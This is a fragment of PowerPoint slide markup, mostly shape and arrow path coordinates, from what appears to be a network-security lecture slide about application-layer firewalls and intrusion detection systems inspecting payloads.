                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899495" y="58313"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="865350" y="33863"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="764537" y="33863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773293" y="34613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768776" y="35400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865258" y="70368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865258" y="58313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899495" y="58313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899495" y="46234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865350" y="33863"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="764537" y="33863"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="768776" y="35400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773293" y="34613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764537" y="33863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148870BC-344C-666A-6F1C-5F3BC567B699}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7859776" y="2528442"/>
              <a:ext cx="455930" cy="514350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="455929" h="514350">
                  <a:moveTo>
                    <a:pt x="441578" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436499" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427448" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388540" y="13747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377951" y="27558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351493" y="63526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326058" y="101023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301636" y="140057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278213" y="180633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255777" y="222757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234640" y="265796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214965" y="308963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196753" y="352264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180004" y="395705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="439293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157104" y="423219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137447" y="389501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112375" y="354161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84077" y="320581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56260" y="294258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52197" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43560" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="309880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="314198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="324357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="329056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14224" y="343662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19176" y="348488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28632" y="358374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66833" y="400780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94265" y="436340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121427" y="476138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136017" y="495934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139573" y="505840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="511301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154431" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159893" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173354" y="514223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214959" y="467193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227393" y="433165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254000" y="367538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282670" y="304784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313054" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345058" y="187451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378205" y="133731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412861" y="82423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451739" y="29209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453390" y="26288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455295" y="21208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="18161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="10032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453771" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446024" y="1269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44157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357D48B1-2CEF-0E2C-7E42-9B72534C15ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7859776" y="2528442"/>
              <a:ext cx="455930" cy="514350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="455929" h="514350">
                  <a:moveTo>
                    <a:pt x="436499" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441578" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446024" y="1269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449833" y="3809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453771" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="10032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="14858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="18161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449325" y="32257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430873" y="57185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395301" y="107946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361489" y="160162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328914" y="215598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297648" y="274365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268120" y="335845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240399" y="399946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214959" y="467193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203073" y="502031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202056" y="504951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187578" y="512190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184530" y="512952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180975" y="513461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177165" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173354" y="514223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169545" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165607" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159893" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154431" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149225" y="512571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="511301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139573" y="505840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136017" y="495934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128609" y="486078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121427" y="476138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114460" y="466127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107696" y="456056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101004" y="446031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94265" y="436340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66833" y="400780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37385" y="367664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14224" y="343662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9905" y="338708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5969" y="333882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="329056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="324357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="319531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="314198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="309880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6096" y="306450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10159" y="303021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14477" y="300355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19303" y="298450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24002" y="296544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="295275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34035" y="294386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39116" y="293624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43560" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47117" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52197" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56260" y="294258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59308" y="296418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62356" y="298576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98583" y="337073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125475" y="371856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148002" y="406622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="439293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180004" y="395705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196753" y="352264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214965" y="308963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234640" y="265796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255777" y="222757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278213" y="180633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301636" y="140057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326058" y="101023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351493" y="63526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377951" y="27558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382835" y="19962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418766" y="1349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427448" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436499" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9144">
              <a:solidFill>
                <a:srgbClr val="243355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C128F32A-38B6-BB9C-D5E2-8BF27414408E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5001641" y="2913506"/>
              <a:ext cx="2915285" cy="1573530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2915284" h="1573529">
                  <a:moveTo>
                    <a:pt x="2741549" y="1535303"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2664206" y="1473327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661539" y="1471129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657475" y="1471574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2653157" y="1477048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2653538" y="1481048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656332" y="1483233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706852" y="1523733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="1121854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="1134427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2704896" y="1536293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641600" y="1561617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639949" y="1565313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641346" y="1568577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642616" y="1571828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646299" y="1573415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730436" y="1539748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741549" y="1535303"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2915284" h="1573529">
                  <a:moveTo>
                    <a:pt x="2915158" y="27813"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2904350" y="24765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819781" y="889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2816352" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812923" y="1905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2811907" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2811018" y="8636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812923" y="12192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2816352" y="13081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2878569" y="30695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="775843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="788162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2881807" y="42989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833370" y="91059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833370" y="95123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2838323" y="100076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2842387" y="100076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2844800" y="97536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915158" y="2781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0B46624C-5EB6-EA9D-DF00-5C6F36CB17EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6090538" y="3877182"/>
              <a:ext cx="553720" cy="737870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="553720" h="737870">
                  <a:moveTo>
                    <a:pt x="447802" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119125" y="737387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="669658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447802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5AD3CADA-6AD8-3025-D3C6-2157982361EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6582790" y="4458665"/>
              <a:ext cx="61594" cy="88265"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="61595" h="88264">
                  <a:moveTo>
                    <a:pt x="61086" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4063" y="25768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61086" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CD111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DC2EAEDD-FC8C-71A8-9D44-E48A86AFB970}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6090538" y="3877182"/>
              <a:ext cx="553720" cy="737870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="553720" h="737870">
                  <a:moveTo>
                    <a:pt x="492252" y="669658"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496315" y="607250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="669658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119125" y="737387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447802" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482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42D0CA73-5B44-943D-D359-4712A7661072}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6300215" y="2968497"/>
              <a:ext cx="492759" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="593089">
                  <a:moveTo>
                    <a:pt x="69469" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="548385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352425" y="592963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492379" y="53593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69469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E899639E-45BC-94B5-E7CE-6ABF0061F16E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6652640" y="3499865"/>
              <a:ext cx="80010" cy="61594"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="80009" h="61595">
                  <a:moveTo>
                    <a:pt x="79501" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21208" y="6984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="61594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795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2A17076C-0878-8017-9F3B-D6B046DCFD0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6300215" y="2968497"/>
              <a:ext cx="492759" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="593089">
                  <a:moveTo>
                    <a:pt x="352425" y="592963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="373634" y="538352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352425" y="592963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69469" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492379" y="53593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25399">
              <a:solidFill>
                <a:srgbClr val="2C2C2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24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC3DFDBB-CB72-07ED-9777-6985D19E6C60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280243" y="4244100"/>
            <a:ext cx="746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Level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7 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Firewall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9E651FA2-F0CE-4E4E-E769-7DA2857830E5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2" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{422D02E7-BA68-A258-04BE-87FD16991461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111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9007969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14309C9-8C7F-17B7-54FD-E617325010DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459816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IDS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5EF0A93-6BED-5D20-1584-20F6067A9D32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459207" y="1154292"/>
            <a:ext cx="78117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There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just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traffic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detection,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but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intrusion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detection!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Intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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Systems</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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(IDS)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inspect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application payload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trying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detect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any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potential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attack.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D4445FFD-C3EA-56C1-B3D9-9FA68947988F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="783133" y="2472805"/>
            <a:ext cx="7581113" cy="2433916"/>
            <a:chOff x="734593" y="2471927"/>
            <a:chExt cx="7581113" cy="2433916"/>
          </a:xfrm>
        </p:grpSpPr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CF3CB8A5-FC85-4F3B-2B28-1C212EB298E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4300" y="2941319"/>
              <a:ext cx="1223772" cy="1508760"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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22D36C93-25E1-396E-98E1-6A9F876BE91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6238" y="2471927"/>
              <a:ext cx="1758188" cy="1223772"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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440A387B-8102-C45E-C4F5-35B4AE8AD1C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593" y="3542283"/>
              <a:ext cx="1131163" cy="1363560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5E3C6A2-2204-BC3D-0737-18F79DF14275}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1879473" y="3832225"/>
              <a:ext cx="2044700" cy="398145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="385610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2285" y="398119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007713" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024518" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032889" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1957577" y="92125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1957197" y="96138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1961768" y="101498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1965705" y="101841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2044191" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032889" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
